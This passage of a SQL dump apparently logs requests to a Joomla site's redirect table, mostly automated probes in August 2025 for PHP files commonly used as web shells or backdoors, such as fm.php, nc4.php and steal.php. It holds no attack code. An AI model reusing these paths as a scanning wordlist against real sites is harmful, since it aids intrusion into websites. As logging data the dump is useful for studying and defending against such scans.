00:00:00',301),(45090,'http://3s-technologies.com.tr/tr/wp-includes/widgets/class-wp-nav-menu-widget-module.php',NULL,'','',1,0,'2025-08-19 03:09:50','0000-00-00 00:00:00',301),(45091,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/decode/admin.php',NULL,'','',1,0,'2025-08-19 03:09:52','0000-00-00 00:00:00',301),(45092,'http://3s-technologies.com.tr/tr/wp-admin/js/install.php',NULL,'','',1,0,'2025-08-19 03:09:54','0000-00-00 00:00:00',301),(45093,'http://3s-technologies.com.tr/tr/wp-content/plugins/woocommerce/includes/shortcodes/wp-login.php',NULL,'','',1,0,'2025-08-19 03:09:55','0000-00-00 00:00:00',301),(45094,'http://3s-technologies.com.tr/tr/wp-content/cache/about.php',NULL,'','',1,0,'2025-08-19 03:09:56','0000-00-00 00:00:00',301),(45095,'http://3s-technologies.com.tr/tr/wp-includes/requests/exception/transport/wp-signup.php',NULL,'','',1,0,'2025-08-19 03:09:57','0000-00-00 00:00:00',301),(45096,'http://3s-technologies.com.tr/tr/wp-includes/class-wp-block-parser-block-restful.php',NULL,'','',1,0,'2025-08-19 03:09:59','0000-00-00 00:00:00',301),(45097,'http://3s-technologies.com.tr/tr/wp-includes/class-pop3-compiler.php',NULL,'','',1,0,'2025-08-19 03:10:00','0000-00-00 00:00:00',301),(45098,'http://3s-technologies.com.tr/tr/wp-includes/css/data.php',NULL,'','',1,0,'2025-08-19 03:10:01','0000-00-00 00:00:00',301),(45099,'http://3s-technologies.com.tr/tr/wp-miiss.php.php',NULL,'','',14,0,'2025-08-19 03:10:02','0000-00-00 00:00:00',301),(45100,'http://3s-technologies.com.tr/tr/wp-includes/id3/module.audio-video.quicktime-cron.php',NULL,'','',1,0,'2025-08-19 03:10:03','0000-00-00 00:00:00',301),(45101,'http://3s-technologies.com.tr/tr/wp-admin/images/about.php whiteshadow.biz/file.php',NULL,'','',1,0,'2025-08-19 03:10:05','0000-00-00 00:00:00',301),(45102,'http://3s-technologies.com.tr/tr/wp-includes/class-wp-hook-ajax-response.php',NULL,'','',1,0,'2025-08-19 03:10:06','0000-00-00 00:00:00',301),(45103,'http://3s-technologies.com.tr/tr/wordpress/wp-admin/about.php',NULL,'','',3,0,'2025-08-19 03:10:10','0000-00-00 00:00:00',301),(45104,'http://3s-technologies.com.tr/tr/wp-includes/js/jcrop/atomlib.php',NULL,'','',1,0,'2025-08-19 03:10:11','0000-00-00 00:00:00',301),(45105,'http://3s-technologies.com.tr/tr/vendor/ramsey/uuid/about.php',NULL,'','',1,0,'2025-08-19 03:10:11','0000-00-00 00:00:00',301),(45106,'http://3s-technologies.com.tr/tr/wp-content/plugins/mkkokgn/index.php',NULL,'','',1,0,'2025-08-19 03:10:13','0000-00-00 00:00:00',301),(45107,'http://3s-technologies.com.tr/tr/wp-includes/rss-functions-session.php',NULL,'','',1,0,'2025-08-19 03:10:14','0000-00-00 00:00:00',301),(45108,'http://3s-technologies.com.tr/tr/e/data.php',NULL,'','',3,0,'2025-08-19 03:10:16','0000-00-00 00:00:00',301),(45109,'http://3s-technologies.com.tr/tr/wp-includes/widgets/class-wp-widget-block-query.php',NULL,'','',1,0,'2025-08-19 03:10:17','0000-00-00 00:00:00',301),(45110,'http://3s-technologies.com.tr/tr/wp-includes/pomo/wp-includes/pomo/about.php',NULL,'','',1,0,'2025-08-19 03:10:18','0000-00-00 00:00:00',301),(45111,'http://3s-technologies.com.tr/tr/wp-content/uploads/2018/12/w-1.php',NULL,'','',1,0,'2025-08-19 03:10:19','0000-00-00 00:00:00',301),(45112,'http://3s-technologies.com.tr/tr/wp-includes/images/403.php',NULL,'','',1,0,'2025-08-19 03:10:20','0000-00-00 00:00:00',301),(45113,'http://3s-technologies.com.tr/tr/uploads/upload2.php',NULL,'','',1,0,'2025-08-19 03:10:21','0000-00-00 00:00:00',301),(45114,'http://3s-technologies.com.tr/tr/wp-includes/class-wp-roles-old.php',NULL,'','',1,0,'2025-08-19 03:10:23','0000-00-00 00:00:00',301),(45115,'http://3s-technologies.com.tr/tr/wp-includes/meta-json.php',NULL,'','',1,0,'2025-08-19 03:10:24','0000-00-00 00:00:00',301),(45116,'http://3s-technologies.com.tr/tr/wp-includes/class-walker-page-object.php',NULL,'','',1,0,'2025-08-19 03:10:25','0000-00-00 00:00:00',301),(45117,'http://3s-technologies.com.tr/tr/wordpress/wp-admin/data.php',NULL,'','',1,0,'2025-08-19 03:10:27','0000-00-00 00:00:00',301),(45118,'http://3s-technologies.com.tr/tr/wp-content/uploads/2016/03/wp-admin-block.php',NULL,'','',1,0,'2025-08-19 03:10:28','0000-00-00 00:00:00',301),(45119,'http://3s-technologies.com.tr/tr/wp-content/uploads/wpr-addons/forms/copypaths.php',NULL,'','',1,0,'2025-08-19 03:10:29','0000-00-00 00:00:00',301),(45120,'http://3s-technologies.com.tr/tr/.well-known/acme-challenge/turbo.php',NULL,'','',1,0,'2025-08-19 03:10:30','0000-00-00 00:00:00',301),(45121,'http://3s-technologies.com.tr/tr/index/data.php',NULL,'','',3,0,'2025-08-19 03:10:31','0000-00-00 00:00:00',301),(45122,'http://3s-technologies.com.tr/tr/wp-includes/post-formats-string.php',NULL,'','',1,0,'2025-08-19 03:10:33','0000-00-00 00:00:00',301),(45123,'http://3s-technologies.com.tr/tr/wp-content/uploads/2015/03/debug.php',NULL,'','',1,0,'2025-08-19 03:10:35','0000-00-00 00:00:00',301),(45124,'http://3s-technologies.com.tr/tr/wp-content/uploads/2023/wp-casper.php',NULL,'','',3,0,'2025-08-19 03:10:37','0000-00-00 00:00:00',301),(45125,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwentyfive/functions.php',NULL,'','',4,0,'2025-08-19 03:10:38','0000-00-00 00:00:00',301),(45126,'http://3s-technologies.com.tr/tr/wp-includes/meta-method.php',NULL,'','',2,0,'2025-08-19 03:10:39','0000-00-00 00:00:00',301),(45127,'http://3s-technologies.com.tr/tr/wp-includes/requests/idnaencoder-term.php',NULL,'','',2,0,'2025-08-19 03:10:40','0000-00-00 00:00:00',301),(45128,'http://3s-technologies.com.tr/tr/wp-admin/maint/index.php kwluxo.com.br/wp-admin/maint/index.php',NULL,'','',2,0,'2025-08-19 03:10:41','0000-00-00 00:00:00',301),(45129,'http://3s-technologies.com.tr/tr/api/api.php',NULL,'','',4,0,'2025-08-19 03:22:04','0000-00-00 00:00:00',301),(45130,'http://3s-technologies.com.tr/tr/filemgrfiles/hui0uh.php',NULL,'','',4,0,'2025-08-19 03:22:04','0000-00-00 00:00:00',301),(45131,'http://3s-technologies.com.tr/tr/yanzmini.php',NULL,'','',4,0,'2025-08-19 03:22:05','0000-00-00 00:00:00',301),(45132,'http://3s-technologies.com.tr/tr/aff.php',NULL,'','',4,0,'2025-08-19 03:22:05','0000-00-00 00:00:00',301),(45133,'http://3s-technologies.com.tr/tr/backup/index.php',NULL,'','',4,0,'2025-08-19 03:22:07','0000-00-00 00:00:00',301),(45134,'http://3s-technologies.com.tr/tr/menu-header.php',NULL,'','',5,0,'2025-08-19 03:22:19','0000-00-00 00:00:00',301),(45135,'http://3s-technologies.com.tr/tr/solevisible.php',NULL,'','',4,0,'2025-08-19 03:22:22','0000-00-00 00:00:00',301),(45136,'http://3s-technologies.com.tr/tr/wp-content/themes/alera',NULL,'','',1,0,'2025-08-19 03:22:27','0000-00-00 00:00:00',301),(45137,'http://3s-technologies.com.tr/tr/wp-content/plugins/elementor/assets/images/app',NULL,'','',1,0,'2025-08-19 03:22:28','0000-00-00 00:00:00',301),(45138,'http://3s-technologies.com.tr/tr/wp-comments-pos.php',NULL,'','',4,0,'2025-08-19 03:22:28','0000-00-00 00:00:00',301),(45139,'http://3s-technologies.com.tr/tr/wp-content/themes/ripro/inc/admin',NULL,'','',1,0,'2025-08-19 03:22:29','0000-00-00 00:00:00',301),(45140,'http://3s-technologies.com.tr/tr/index/b/home/h213348220/fundlead.ru/docs/wp-admin/includes',NULL,'','',1,0,'2025-08-19 03:22:30','0000-00-00 00:00:00',301),(45141,'http://3s-technologies.com.tr/tr/wp-content/plugins/woocommerce/assets/client/blocks/products-by-attribute',NULL,'','',1,0,'2025-08-19 03:22:31','0000-00-00 00:00:00',301),(45142,'http://3s-technologies.com.tr/tr/content/userfiles/news/orjinal',NULL,'','',1,0,'2025-08-19 03:22:33','0000-00-00 00:00:00',301),(45143,'http://3s-technologies.com.tr/tr/wp-content/themes/sketch',NULL,'','',1,0,'2025-08-19 03:22:33','0000-00-00 00:00:00',301),(45144,'http://3s-technologies.com.tr/tr/templates/p/snippets/g8ofh3h3db/raw',NULL,'','',1,0,'2025-08-19 03:22:34','0000-00-00 00:00:00',301),(45145,'http://3s-technologies.com.tr/tr/wp-content/plugins/elementor/assets/ioxi-o.php',NULL,'','',1,0,'2025-08-19 03:22:35','0000-00-00 00:00:00',301),(45146,'http://3s-technologies.com.tr/tr/wp-cro.php',NULL,'','',4,0,'2025-08-19 03:22:37','0000-00-00 00:00:00',301),(45147,'http://3s-technologies.com.tr/tr/wp-includes/requests/abou.php',NULL,'','',5,0,'2025-08-19 03:22:37','0000-00-00 00:00:00',301),(45148,'http://3s-technologies.com.tr/tr/wordpress/wp-includes/js/mediaelement/renderers',NULL,'','',1,0,'2025-08-19 03:22:38','0000-00-00 00:00:00',301),(45149,'http://3s-technologies.com.tr/tr/wp-content/plugins/oxygen/component-framework/components/classes/gallery/photoswipe',NULL,'','',1,0,'2025-08-19 03:22:38','0000-00-00 00:00:00',301),(45150,'http://3s-technologies.com.tr/tr/wp-content/plugins/seo-by-rank-math/vendor/woocommerce',NULL,'','',1,0,'2025-08-19 03:22:40','0000-00-00 00:00:00',301),(45151,'http://3s-technologies.com.tr/tr/wp-content/plugins/ultimate-addons-for-gutenberg/blocks-config/uagb-controls',NULL,'','',1,0,'2025-08-19 03:22:41','0000-00-00 00:00:00',301),(45152,'http://3s-technologies.com.tr/tr/wp-content/themes/twenty',NULL,'','',1,0,'2025-08-19 03:22:42','0000-00-00 00:00:00',301),(45153,'http://3s-technologies.com.tr/tr/newlms/assets/frontend',NULL,'','',1,0,'2025-08-19 03:22:43','0000-00-00 00:00:00',301),(45154,'http://3s-technologies.com.tr/tr/wp-content/themes/blocksy/static/sass/frontend/6-layout/entries',NULL,'','',1,0,'2025-08-19 03:22:45','0000-00-00 00:00:00',301),(45155,'http://3s-technologies.com.tr/tr/wp-content/plugins/wordpress-seo/vendor_prefixed/symfony',NULL,'','',1,0,'2025-08-19 03:22:48','0000-00-00 00:00:00',301),(45156,'http://3s-technologies.com.tr/tr/.well-known/acme-challenge/action=.',NULL,'','',1,0,'2025-08-19 03:22:49','0000-00-00 00:00:00',301),(45157,'http://3s-technologies.com.tr/tr/vendor/symfony/serializer/mapping',NULL,'','',1,0,'2025-08-19 03:22:50','0000-00-00 00:00:00',301),(45158,'http://3s-technologies.com.tr/tr/wp-content/themes/blocksy',NULL,'','',1,0,'2025-08-19 03:22:51','0000-00-00 00:00:00',301),(45159,'http://3s-technologies.com.tr/tr/assets/admin/plugins/ckeditor/plugins/scayt/dialogs/dialogs',NULL,'','',1,0,'2025-08-19 03:22:52','0000-00-00 00:00:00',301),(45160,'http://3s-technologies.com.tr/tr/wp-content/plugins/woocommerce/includes/gateways',NULL,'','',1,0,'2025-08-19 03:22:56','0000-00-00 00:00:00',301),(45161,'http://3s-technologies.com.tr/tr/wp-content/fonts/wp-content/fonts',NULL,'','',1,0,'2025-08-19 03:22:57','0000-00-00 00:00:00',301),(45162,'http://3s-technologies.com.tr/tr/images/icons/rouyg/hppd',NULL,'','',1,0,'2025-08-19 03:22:58','0000-00-00 00:00:00',301),(45163,'http://3s-technologies.com.tr/tr/wp-content/plugins/insert-headers-and-footers/includes/auto-insert',NULL,'','',1,0,'2025-08-19 03:22:58','0000-00-00 00:00:00',301),(45164,'http://3s-technologies.com.tr/tr/wp-includesmaps/p/snippets/g8ofh3h3db/raw',NULL,'','',1,0,'2025-08-19 03:23:00','0000-00-00 00:00:00',301),(45165,'http://3s-technologies.com.tr/tr/wp-content/plugins/file-manager-advanced/application/library/codemirror/mode/jsx',NULL,'','',1,0,'2025-08-19 03:23:01','0000-00-00 00:00:00',301),(45166,'http://3s-technologies.com.tr/tr/templates/ja_purity',NULL,'','',1,0,'2025-08-19 03:23:01','0000-00-00 00:00:00',301),(45167,'http://3s-technologies.com.tr/tr/wp-includes/ioxi-o.php',NULL,'','',4,0,'2025-08-19 03:23:02','0000-00-00 00:00:00',301),(45168,'http://3s-technologies.com.tr/tr/wp-content/plugins/generateblocks/src/components/unit-picker',NULL,'','',1,0,'2025-08-19 03:23:03','0000-00-00 00:00:00',301),(45169,'http://3s-technologies.com.tr/tr/wp-includesmaps',NULL,'','',1,0,'2025-08-19 03:23:03','0000-00-00 00:00:00',301),(45170,'http://3s-technologies.com.tr/tr/wp-include.php',NULL,'','',1,0,'2025-08-19 03:23:04','0000-00-00 00:00:00',301),(45171,'http://3s-technologies.com.tr/tr/sos/newtheme/images/villagespictures/dhodial/dhodial',NULL,'','',1,0,'2025-08-19 03:23:05','0000-00-00 00:00:00',301),(45172,'http://3s-technologies.com.tr/tr/wp-content/plugins/bdthemes-element-pack/modules/review-card',NULL,'','',1,0,'2025-08-19 03:23:07','0000-00-00 00:00:00',301),(45173,'http://3s-technologies.com.tr/tr/wp-content/plugins/w3-total-cache/lib/aws/aws/api/parser',NULL,'','',1,0,'2025-08-19 03:23:08','0000-00-00 00:00:00',301),(45174,'http://3s-technologies.com.tr/tr/wp-content/themes/astra/inc/modules',NULL,'','',1,0,'2025-08-19 03:23:10','0000-00-00 00:00:00',301),(45175,'http://3s-technologies.com.tr/tr/wp-mai.php',NULL,'','',4,0,'2025-08-19 03:23:10','0000-00-00 00:00:00',301),(45176,'http://3s-technologies.com.tr/tr/wp-taglin.php',NULL,'','',5,0,'2025-08-19 03:23:11','0000-00-00 00:00:00',301),(45177,'http://3s-technologies.com.tr/tr/wp-includes/js/tinymce/plugins/wpeditimage/wpeditimage',NULL,'','',1,0,'2025-08-19 03:23:12','0000-00-00 00:00:00',301),(45178,'http://3s-technologies.com.tr/tr/wp-content/plugins/wp-table-builder/inc/core/freemius/assets/ioxi-o.php',NULL,'','',1,0,'2025-08-19 03:23:13','0000-00-00 00:00:00',301),(45179,'http://3s-technologies.com.tr/tr/wp-content/plugins/revslider/public/assets/js/libs',NULL,'','',1,0,'2025-08-19 03:23:14','0000-00-00 00:00:00',301),(45180,'http://3s-technologies.com.tr/tr/wp-content/plugins/pro-elements/modules/notes/database/query',NULL,'','',1,0,'2025-08-19 03:23:15','0000-00-00 00:00:00',301),(45181,'http://3s-technologies.com.tr/tr/wp-content/languages/themes/wp-content/languages/themes',NULL,'','',1,0,'2025-08-19 03:23:16','0000-00-00 00:00:00',301),(45182,'http://3s-technologies.com.tr/tr/wp-content/plugins/js_composer/include/params/options',NULL,'','',1,0,'2025-08-19 03:23:17','0000-00-00 00:00:00',301),(45183,'http://3s-technologies.com.tr/tr/wp-content/plugins/woocommerce/packages',NULL,'','',1,0,'2025-08-19 03:23:17','0000-00-00 00:00:00',301),(45184,'http://3s-technologies.com.tr/tr/backup/wp-content/themes',NULL,'','',1,0,'2025-08-19 03:23:18','0000-00-00 00:00:00',301),(45185,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwentythree/parts',NULL,'','',1,0,'2025-08-19 03:23:18','0000-00-00 00:00:00',301),(45186,'http://3s-technologies.com.tr/tr/wp-includes/css/dist/block-library/action',NULL,'','',1,0,'2025-08-19 03:23:19','0000-00-00 00:00:00',301),(45187,'http://3s-technologies.com.tr/tr/wp-content/plugins/not/includes',NULL,'','',1,0,'2025-08-19 03:23:20','0000-00-00 00:00:00',301),(45188,'http://3s-technologies.com.tr/tr/about',NULL,'','',1,0,'2025-08-19 03:23:21','0000-00-00 00:00:00',301),(45189,'http://3s-technologies.com.tr/tr/wordpress/wp-includes/sodium_compat/src/core32',NULL,'','',1,0,'2025-08-19 03:23:22','0000-00-00 00:00:00',301),(45190,'http://3s-technologies.com.tr/tr/wp-content/td',NULL,'','',1,0,'2025-08-19 03:23:23','0000-00-00 00:00:00',301),(45191,'http://3s-technologies.com.tr/tr/about/b/home/iune/www/about',NULL,'','',1,0,'2025-08-19 03:23:23','0000-00-00 00:00:00',301),(45192,'http://3s-technologies.com.tr/tr/wp-content/plugins/revslider/admin/assets/images/navigationeditor',NULL,'','',1,0,'2025-08-19 03:23:24','0000-00-00 00:00:00',301),(45193,'http://3s-technologies.com.tr/tr/classwithtostrin.php/rbzccnn.php',NULL,'','',1,0,'2025-08-19 03:23:25','0000-00-00 00:00:00',301),(45194,'http://3s-technologies.com.tr/tr/wp-content/upgrade-temp-backup',NULL,'','',2,0,'2025-08-19 03:23:25','0000-00-00 00:00:00',301),(45195,'http://3s-technologies.com.tr/tr/wp-content/themes/listdo/inc',NULL,'','',1,0,'2025-08-19 03:23:30','0000-00-00 00:00:00',301),(45196,'http://3s-technologies.com.tr/tr/http:/gracecommunications.church',NULL,'','',1,0,'2025-08-19 03:23:31','0000-00-00 00:00:00',301),(45197,'http://3s-technologies.com.tr/tr/wp-content/plugins/wp-rocket/inc/admin/ui',NULL,'','',1,0,'2025-08-19 03:23:33','0000-00-00 00:00:00',301),(45198,'http://3s-technologies.com.tr/tr/wp-admin/sr',NULL,'','',1,0,'2025-08-19 03:23:37','0000-00-00 00:00:00',301),(45199,'http://3s-technologies.com.tr/tr/wp-includes/text/diff/engine/require',NULL,'','',1,0,'2025-08-19 03:23:38','0000-00-00 00:00:00',301),(45200,'http://3s-technologies.com.tr/tr/index/sr',NULL,'','',1,0,'2025-08-19 03:23:38','0000-00-00 00:00:00',301),(45201,'http://3s-technologies.com.tr/tr/wp-content/plugins/duplicatepost/src/ui',NULL,'','',1,0,'2025-08-19 03:23:39','0000-00-00 00:00:00',301),(45202,'http://3s-technologies.com.tr/tr/wp-content/uploads/wp-content/uploads',NULL,'','',1,0,'2025-08-19 03:23:40','0000-00-00 00:00:00',301),(45203,'http://3s-technologies.com.tr/tr/wp-content/plugins/smartmag-core',NULL,'','',1,0,'2025-08-19 03:23:41','0000-00-00 00:00:00',301),(45204,'http://3s-technologies.com.tr/tr/wp-content/plugins/jetpack/_inc/build/shortcodes/js',NULL,'','',1,0,'2025-08-19 03:23:43','0000-00-00 00:00:00',301),(45205,'http://3s-technologies.com.tr/tr/wp-includes/js/tinymce/plugins/wpview/wp',NULL,'','',1,0,'2025-08-19 03:23:45','0000-00-00 00:00:00',301),(45206,'http://3s-technologies.com.tr/tr/sec/core/tests/drupal/functionaltests/hal',NULL,'','',1,0,'2025-08-19 03:23:48','0000-00-00 00:00:00',301),(45207,'http://3s-technologies.com.tr/tr/wp-content/plugins/jet-engine/includes/components/glossaries/assets/css/admin',NULL,'','',1,0,'2025-08-19 03:23:49','0000-00-00 00:00:00',301),(45208,'http://3s-technologies.com.tr/tr/wp-content/plugins/all-in-one-seo-pack/vendor_prefixed/psr/log/psr',NULL,'','',1,0,'2025-08-19 03:23:50','0000-00-00 00:00:00',301),(45209,'http://3s-technologies.com.tr/tr/wp-content/plugins/elementor/core/admin/ui/components',NULL,'','',1,0,'2025-08-19 03:23:51','0000-00-00 00:00:00',301),(45210,'http://3s-technologies.com.tr/tr/.well-known/config',NULL,'','',1,0,'2025-08-19 03:23:53','0000-00-00 00:00:00',301),(45211,'http://3s-technologies.com.tr/tr/css/colors/coffee',NULL,'','',1,0,'2025-08-19 03:24:01','0000-00-00 00:00:00',301),(45212,'http://3s-technologies.com.tr/tr/libraries/php',NULL,'','',1,0,'2025-08-19 03:24:07','0000-00-00 00:00:00',301),(45213,'http://3s-technologies.com.tr/tr/maintenance.php',NULL,'','',1,0,'2025-08-19 03:24:10','0000-00-00 00:00:00',301),(45214,'http://3s-technologies.com.tr/tr/plugins/custom',NULL,'','',1,0,'2025-08-19 03:24:12','0000-00-00 00:00:00',301),(45215,'http://3s-technologies.com.tr/tr/vendor/bin/loader.php/wp-admin',NULL,'','',1,0,'2025-08-19 03:24:18','0000-00-00 00:00:00',301),(45216,'http://3s-technologies.com.tr/tr/wp-content/plugins/wordpresscore/fm.php',NULL,'','',2,0,'2025-08-19 03:24:30','0000-00-00 00:00:00',301),(45217,'http://3s-technologies.com.tr/tr/wp-content/plugins/core-plugin',NULL,'','',1,0,'2025-08-19 03:24:31','0000-00-00 00:00:00',301),(45218,'http://3s-technologies.com.tr/tr/wp-includes/css/dist/preferences',NULL,'','',1,0,'2025-08-19 03:24:44','0000-00-00 00:00:00',301),(45219,'http://3s-technologies.com.tr/tr/files/media.php',NULL,'','',1,0,'2025-08-19 08:40:53','0000-00-00 00:00:00',301),(45220,'http://3s-technologies.com.tr/tr/wp-admin/0x.php',NULL,'','',1,0,'2025-08-19 08:41:46','0000-00-00 00:00:00',301),(45221,'https://www.3s-technologies.com.tr/tr/ahşap-işleme-wood-processing-120cm\n',NULL,'','',3,0,'2025-08-19 10:41:56','0000-00-00 00:00:00',301),(45222,'http://3s-technologies.com.tr/tr/np.php',NULL,'','',5,0,'2025-08-19 16:20:34','0000-00-00 00:00:00',301),(45223,'http://3s-technologies.com.tr/tr/mek.php',NULL,'','',8,0,'2025-08-19 16:20:37','0000-00-00 00:00:00',301),(45224,'http://3s-technologies.com.tr/tr/zse.php',NULL,'','',5,0,'2025-08-19 16:20:37','0000-00-00 00:00:00',301),(45225,'http://3s-technologies.com.tr/tr/akp.php',NULL,'','',17,0,'2025-08-19 16:20:39','0000-00-00 00:00:00',301),(45226,'http://3s-technologies.com.tr/tr/dlex.php',NULL,'','',8,0,'2025-08-19 16:20:40','0000-00-00 00:00:00',301),(45227,'https://www.3s-technologies.com.tr/tr/ana-sayfa\n',NULL,'','',1,0,'2025-08-19 18:27:54','0000-00-00 00:00:00',301),(45228,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/ectoplasm/nc4.php',NULL,'','',1,0,'2025-08-19 21:46:29','0000-00-00 00:00:00',301),(45229,'http://3s-technologies.com.tr/tr/wp-includes/rest-api/nc4.php',NULL,'','',1,0,'2025-08-19 21:46:30','0000-00-00 00:00:00',301),(45230,'http://3s-technologies.com.tr/tr/wp-includes/js/codemirror/nc4.php',NULL,'','',1,0,'2025-08-19 21:46:31','0000-00-00 00:00:00',301),(45231,'http://3s-technologies.com.tr/tr/wp-includes/sitemaps/nc4.php',NULL,'','',1,0,'2025-08-19 21:46:32','0000-00-00 00:00:00',301),(45232,'http://3s-technologies.com.tr/tr/wp-includes/js/dist/script-modules/interactivity/interactivity/interactivity/nc4.php',NULL,'','',1,0,'2025-08-19 21:46:32','0000-00-00 00:00:00',301),(45233,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/pcb-prototip-prototyping\n',NULL,'','',2,0,'2025-08-19 22:18:58','0000-00-00 00:00:00',301),(45234,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/ana-sayfa\n',NULL,'','',3,0,'2025-08-20 05:23:09','0000-00-00 00:00:00',301),(45235,'https://3s-technologies.com.tr/en/wordpress/wp-login.php',NULL,'https://www.google.com/search?q=wordpress','',16,0,'2025-08-20 05:23:32','0000-00-00 00:00:00',301),(45236,'https://3s-technologies.com.tr/tr/hakkımızda\n',NULL,'','',2,0,'2025-08-20 07:35:49','0000-00-00 00:00:00',301),(45237,'http://3s-technologies.com.tr/tr/service.php',NULL,'','',1,0,'2025-08-20 11:55:50','0000-00-00 00:00:00',301),(45238,'http://3s-technologies.com.tr/tr/testmail.php',NULL,'','',2,0,'2025-08-20 11:55:51','0000-00-00 00:00:00',301),(45239,'http://3s-technologies.com.tr/tr/orm.php',NULL,'','',21,0,'2025-08-20 11:55:54','0000-00-00 00:00:00',301),(45240,'http://3s-technologies.com.tr/tr/ps.php',NULL,'','',12,0,'2025-08-20 11:55:55','0000-00-00 00:00:00',301),(45241,'http://3s-technologies.com.tr/tr/zews.php',NULL,'','',12,0,'2025-08-20 11:55:57','0000-00-00 00:00:00',301),(45242,'http://3s-technologies.com.tr/tr/u6dex.php',NULL,'','',2,0,'2025-08-20 11:55:59','0000-00-00 00:00:00',301),(45243,'http://3s-technologies.com.tr/tr/saiga.php',NULL,'','',3,0,'2025-08-20 11:55:59','0000-00-00 00:00:00',301),(45244,'http://3s-technologies.com.tr/tr/xex.php',NULL,'','',15,0,'2025-08-20 11:56:00','0000-00-00 00:00:00',301),(45245,'http://3s-technologies.com.tr/tr/store.php',NULL,'','',3,0,'2025-08-20 11:56:00','0000-00-00 00:00:00',301),(45246,'http://3s-technologies.com.tr/tr/play.php',NULL,'','',1,0,'2025-08-20 11:56:01','0000-00-00 00:00:00',301),(45247,'http://3s-technologies.com.tr/tr/bodys.php',NULL,'','',1,0,'2025-08-20 11:56:01','0000-00-00 00:00:00',301),(45248,'http://3s-technologies.com.tr/tr/baxi.php',NULL,'','',1,0,'2025-08-20 11:56:02','0000-00-00 00:00:00',301),(45249,'http://3s-technologies.com.tr/tr/yindi.php',NULL,'','',1,0,'2025-08-20 11:56:02','0000-00-00 00:00:00',301),(45250,'http://3s-technologies.com.tr/tr/itil.php',NULL,'','',9,0,'2025-08-20 11:56:04','0000-00-00 00:00:00',301),(45251,'http://3s-technologies.com.tr/tr/rafu.php',NULL,'','',2,0,'2025-08-20 11:56:06','0000-00-00 00:00:00',301),(45252,'http://3s-technologies.com.tr/tr/oqonvptk.php',NULL,'','',1,0,'2025-08-20 11:56:07','0000-00-00 00:00:00',301),(45253,'http://3s-technologies.com.tr/tr/wpmahi1.php',NULL,'','',1,0,'2025-08-20 11:56:07','0000-00-00 00:00:00',301),(45254,'http://3s-technologies.com.tr/tr/wp-f.php',NULL,'','',4,0,'2025-08-20 11:56:08','0000-00-00 00:00:00',301),(45255,'http://3s-technologies.com.tr/tr/setting.php',NULL,'','',1,0,'2025-08-20 11:56:08','0000-00-00 00:00:00',301),(45256,'http://3s-technologies.com.tr/tr/dodjxg.php',NULL,'','',1,0,'2025-08-20 11:56:09','0000-00-00 00:00:00',301),(45257,'http://3s-technologies.com.tr/tr/e8l0qa.php',NULL,'','',1,0,'2025-08-20 11:56:10','0000-00-00 00:00:00',301),(45258,'http://3s-technologies.com.tr/tr/ep5gdp.php',NULL,'','',1,0,'2025-08-20 11:56:10','0000-00-00 00:00:00',301),(45259,'http://3s-technologies.com.tr/tr/qnjmkm.php',NULL,'','',1,0,'2025-08-20 11:56:11','0000-00-00 00:00:00',301),(45260,'http://3s-technologies.com.tr/tr/kfyo.php',NULL,'','',1,0,'2025-08-20 11:56:12','0000-00-00 00:00:00',301),(45261,'http://3s-technologies.com.tr/tr/class20.php',NULL,'','',99,0,'2025-08-20 11:56:13','0000-00-00 00:00:00',301),(45262,'http://3s-technologies.com.tr/tr/tumn.php',NULL,'','',3,0,'2025-08-20 11:56:14','0000-00-00 00:00:00',301),(45263,'http://3s-technologies.com.tr/tr/fai.php',NULL,'','',3,0,'2025-08-20 11:56:15','0000-00-00 00:00:00',301),(45264,'http://3s-technologies.com.tr/tr/124.php',NULL,'','',12,0,'2025-08-20 11:56:15','0000-00-00 00:00:00',301),(45265,'http://3s-technologies.com.tr/tr/ahax.php',NULL,'','',113,0,'2025-08-20 11:56:16','0000-00-00 00:00:00',301),(45266,'http://3s-technologies.com.tr/tr/zt2.php',NULL,'','',12,0,'2025-08-20 11:56:17','0000-00-00 00:00:00',301),(45267,'http://3s-technologies.com.tr/tr/bild.php',NULL,'','',2,0,'2025-08-20 11:56:18','0000-00-00 00:00:00',301),(45268,'http://3s-technologies.com.tr/tr/ubh.php',NULL,'','',2,0,'2025-08-20 11:56:19','0000-00-00 00:00:00',301),(45269,'http://3s-technologies.com.tr/tr/zp.php',NULL,'','',3,0,'2025-08-20 11:56:21','0000-00-00 00:00:00',301),(45270,'http://3s-technologies.com.tr/tr/geck.php',NULL,'','',66,0,'2025-08-20 11:56:22','0000-00-00 00:00:00',301),(45271,'http://3s-technologies.com.tr/tr/o1i2ien.php',NULL,'','',3,0,'2025-08-20 11:56:23','0000-00-00 00:00:00',301),(45272,'http://3s-technologies.com.tr/tr/rpz.php',NULL,'','',2,0,'2025-08-20 11:56:23','0000-00-00 00:00:00',301),(45273,'http://3s-technologies.com.tr/tr/rrr.php',NULL,'','',24,0,'2025-08-20 11:56:24','0000-00-00 00:00:00',301),(45274,'http://3s-technologies.com.tr/tr/steal.php',NULL,'','',2,0,'2025-08-20 11:56:24','0000-00-00 00:00:00',301),(45275,'http://3s-technologies.com.tr/tr/shout.php',NULL,'','',12,0,'2025-08-20 11:56:25','0000-00-00 00:00:00',301),(45276,'http://3s-technologies.com.tr/tr/birdie.php',NULL,'','',1,0,'2025-08-20 11:56:26','0000-00-00 00:00:00',301),(45277,'http://3s-technologies.com.tr/tr/wp-gr.php',NULL,'','',64,0,'2025-08-20 11:56:27','0000-00-00 00:00:00',301),(45278,'http://3s-technologies.com.tr/tr/wp-mn.php',NULL,'','',25,0,'2025-08-20 11:56:28','0000-00-00 00:00:00',301),(45279,'http://3s-technologies.com.tr/tr/wp-mt.php',NULL,'','',15,0,'2025-08-20 11:56:28','0000-00-00 00:00:00',301),(45280,'http://3s-technologies.com.tr/tr/syl1yt.php',NULL,'','',2,0,'2025-08-20 11:56:29','0000-00-00 00:00:00',301),(45281,'http://3s-technologies.com.tr/tr/suc.php',NULL,'','',3,0,'2025-08-20 11:56:30','0000-00-00 00:00:00',301),(45282,'http://3s-technologies.com.tr/tr/ovka.php',NULL,'','',2,0,'2025-08-20 11:56:31','0000-00-00 00:00:00',301),(45283,'http://3s-technologies.com.tr/tr/lexy.php',NULL,'','',2,0,'2025-08-20 11:56:32','0000-00-00 